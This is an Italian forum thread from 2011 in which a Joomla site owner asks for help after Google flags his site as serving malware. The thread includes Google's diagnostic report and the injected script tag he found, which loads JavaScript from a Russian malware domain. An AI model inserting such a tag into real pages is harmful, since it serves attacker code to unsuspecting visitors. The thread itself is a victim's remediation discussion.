Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

OVHcloud Summit 2025: le novità del cloud europeo tra sovranità, IA e quantum
OVHcloud Summit 2025: le novità del cloud europeo tra sovranità, IA e quantum
Abbiamo partecipato all'OVHcloud Summit 2025, conferenza annuale in cui l'azienda francese presenta le sue ultime novità. Abbiamo parlato di cloud pubblico e privato, d'intelligenza artificiale, di computer quantistici e di sovranità. Che forse, però, dovremmo chiamare solo "sicurezza"
Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI Care e DisplayPort 2.1a
Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI Care e DisplayPort 2.1a
Abbiamo potuto mettere le mani in anteprima sul nuovo monitor MSI dedicato ai giocatori: un mostro che adotta un pannello QD-OLED da 26,5 pollici con risoluzione 2560 x 1440 pixel, frequenza di aggiornamento fino a 500 Hz e tempo di risposta di 0,03 ms GtG
DJI Neo 2 in prova: il drone da 160 grammi guadagna il gimbal e molto altro
DJI Neo 2 in prova: il drone da 160 grammi guadagna il gimbal e molto altro
DJI aggiorna la sua linea di droni ultraleggeri con Neo 2, un quadricottero da 160 grammi che mantiene la compattezza del predecessore ma introduce una stabilizzazione meccanica a due assi, sensori omnidirezionali e un sistema LiDAR
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 12-12-2011, 08:51   #1
chrys75
Senior Member
 
L'Avatar di chrys75
 
Iscritto dal: Aug 2000
Messaggi: 742
Sito Infetto, cosa fare?

Ragazzi son odue anni che ho un sito su aruba, uso joomla 1.5 e virtuemart, tutto ok, ma questa mattina google mi ha bloccato il sito con questo annuncio:

www.bull-sc .com

Ora non so proprio cosa fare, se era sul mio pc facevo scansione ecc, ma in remoto come comportarmi per ripristinare il prima possibile il danno?

Grazie


Scusate ma proprio ora ho visto che il sito è ripartito, quello che mi appariva era una schermata rossa che diceva che il sito era bloccato perchè era stato trovato un malware esattamente un collegamento da un sito russo: sh1090.ru

Ultima modifica di Chill-Out : 12-12-2011 alle 09:35. Motivo: Editato link
chrys75 è offline   Rispondi citando il messaggio o parte di esso
Old 12-12-2011, 09:07   #2
chrys75
Senior Member
 
L'Avatar di chrys75
 
Iscritto dal: Aug 2000
Messaggi: 742
un aiuto in più:

Navigazione sicura
Pagina di diagnostica per bull-sc.com

Qual è lo stato attuale di bull-sc.com nell'elenco?

Il sito è indicato come sospetto: una visita a questo sito web potrebbe danneggiare il tuo computer.

Parte del sito è stata segnalata per attività sospetta 2 volte nel corso degli ultimi 90 giorni.

Che cosa è successo dopo la visita di Google a questo sito?
Dal test di 3 pagine del sito eseguito negli ultimi 90 giorni, è emerso che da 2 pagine è stato scaricato e installato software dannoso senza l'autorizzazione dell'utente. L'ultima visita di Google a questo sito è stata effettuata in data 2011-12-11 e contenuto sospetto è stato rilevato l'ultima volta in data 2011-12-11.

Software dannoso è ospitato su 2 domini, tra cui kupilkoprodb.in/, sh1090.ru/.

1 domini sembravano fungere da intermediari per la distribuzione di malware ai visitatori di questo sito, tra cui sh1090.ru/.

Questo sito è stato ospitato su 1 reti tra cui AS31034 (ARUBA).

Il sito ha assunto la funzione di intermediario per la distribuzione di malware?

Nel corso degli ultimi 90 giorni, bull-sc.com non ha assunto la funzione di intermediario per la distribuzione di malware o virus ad altri siti.

Questo sito ha ospitato malware?

No, questo sito non ha ospitato software dannoso nel corso degli ultimi 90 giorni.

Ragioni

In alcuni casi, terze parti possono aggiungere codice dannoso a siti autentici e questo è il motivo alla base della visualizzazione del messaggio di avviso.

Passaggi successivi:
Torna alla pagina precedente.
Se sei il proprietario di questo sito web, puoi chiedere che il tuo sito venga riesaminato utilizzando gli Strumenti per i Webmaster di Google. Per ulteriori informazioni sul processo di revisione, consulta il Centro assistenza per webmaster di Google.
chrys75 è offline   Rispondi citando il messaggio o parte di esso
Old 12-12-2011, 09:38   #3
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Elimina sh1090.ru/wp-content/plugins/menu/code.js
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 12-12-2011, 09:50   #4
chrys75
Senior Member
 
L'Avatar di chrys75
 
Iscritto dal: Aug 2000
Messaggi: 742
come faccio a trovarlo?

google lo ha trovato qui:

<script type="text/javascript" src="http://sh1090.ru/wp-cont
ent/plugins/menu/code.js">


ma questo dove si trova?
chrys75 è offline   Rispondi citando il messaggio o parte di esso
Old 12-12-2011, 10:07   #5
chrys75
Senior Member
 
L'Avatar di chrys75
 
Iscritto dal: Aug 2000
Messaggi: 742
Ho trovato questa stringa sull'html di inizio del sito, dvoe fa il reindirizzamento alla cartella /web... li dentro è installato joomla.

A questo punto penso che hanno infettato solo il codice html iniziale e non tutto joomla..

come posso fare a rendere sicura questa pagina iniziale?
chrys75 è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


OVHcloud Summit 2025: le novità del cloud europeo tra sovranità, IA e quantum OVHcloud Summit 2025: le novità del cloud...
Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI Care e DisplayPort 2.1a Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI C...
DJI Neo 2 in prova: il drone da 160 grammi guadagna il gimbal e molto altro DJI Neo 2 in prova: il drone da 160 grammi guada...
L'IA "seria" di Appian è diversa: inserita nei processi e rispetta dati e persone L'IA "seria" di Appian è divers...
Polestar 3 Performance, test drive: comodità e potenza possono convivere Polestar 3 Performance, test drive: comodit&agra...
A causa di un problema durante il lancio...
Per il responsabile delle Porsche 911 e ...
Ritorno di fiamma tra Apple e Intel: gal...
Horses è stato 'bannato': l'horro...
Truffe finanziarie sui social, scatta il...
Tesla inaugura a Busto Arsizio la postaz...
Barriere autostradali fotovoltaiche: Ana...
Accordo Gruppo FS-Microsoft: l'IA dell'a...
Prezzo mai visto: le Sony WH-1000XM5 Spe...
Microsoft amplierà il suo laborat...
ECOVACS DEEBOT T30C OMNI GEN2 a 349€: co...
Super offerta Amazon: HP OMEN MAX 16 con...
L'offerta nascosta di Very Mobile fa gol...
LEAP 71: completata l'accensione di un p...
Furto di segreti industriali in TSMC: pe...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 07:00.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v